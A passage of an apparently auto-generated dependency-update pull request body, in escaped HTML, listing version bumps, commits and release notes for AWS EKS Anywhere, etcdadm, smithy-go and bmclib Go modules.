(\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.25.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.25.0\u003c/h2\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.4\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-06-16)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.4\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fix CBOR serd empty check for string and enum fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.3\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-02-17)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.3\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum Go version to 1.22 per our language support policy.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/blob/main/CHANGELOG.md\"\u003egithub.com/aws/smithy-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-04-23)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fixed a memory leak in the LRU cache implementation used by some AWS services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-02)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.3\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go/aws-http-auth\u003c/code\u003e: \u003ca href=\"https://github.com/aws/smithy-go/blob/main/aws-http-auth/CHANGELOG.md#v113-2026-04-02\"\u003ev1.1.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2025-12-01)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/e094f45e716e33a1b950cf8bbe804790bf87f965\"\u003e\u003ccode\u003ee094f45\u003c/code\u003e\u003c/a\u003e Release 2026-04-23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/214d45be3be5188c4d2fd9cf744c21f8b3dfbabc\"\u003e\u003ccode\u003e214d45b\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3477da0b4dbf31de58ac375fe5abe5d268280824\"\u003e\u003ccode\u003e3477da0\u003c/code\u003e\u003c/a\u003e fix lrucache memory leak on existing item put (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/652\"\u003e#652\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/0d0b4d00f2430e62a790203b89fd76dceb4ae213\"\u003e\u003ccode\u003e0d0b4d0\u003c/code\u003e\u003c/a\u003e Bump Smithy version to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/be5e5ef0d73560eac9d71df7995b0eaffb9a8d71\"\u003e\u003ccode\u003ebe5e5ef\u003c/code\u003e\u003c/a\u003e check \u003ca href=\"https://github.com/enum\"\u003e\u003ccode\u003e@​enum\u003c/code\u003e\u003c/a\u003e on strings for cbor (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/649\"\u003e#649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/5beb80e9da6bcad40dc304f062c27d8269abd67d\"\u003e\u003ccode\u003e5beb80e\u003c/code\u003e\u003c/a\u003e Ensure javadoc uses utf-8 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/648\"\u003e#648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/73bb8a7d6e222332d46eec7209ba3cd0ba520239\"\u003e\u003ccode\u003e73bb8a7\u003c/code\u003e\u003c/a\u003e Release 2026-04-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f056c6fb0b43ba9bfeca6c29c8c1e1046437e45e\"\u003e\u003ccode\u003ef056c6f\u003c/code\u003e\u003c/a\u003e Changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/ee36afc3d70050ba990c8de8d65043ac11d1f9f4\"\u003e\u003ccode\u003eee36afc\u003c/code\u003e\u003c/a\u003e Implement BDD generator for \u003ca href=\"https://github.com/endpointBdd\"\u003e\u003ccode\u003e@​endpointBdd\u003c/code\u003e\u003c/a\u003e Smithy trait (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/647\"\u003e#647\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3dbea7015f5ed79312e2a3cb6bbf39f7a26e46ea\"\u003e\u003ccode\u003e3dbea70\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.25.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare 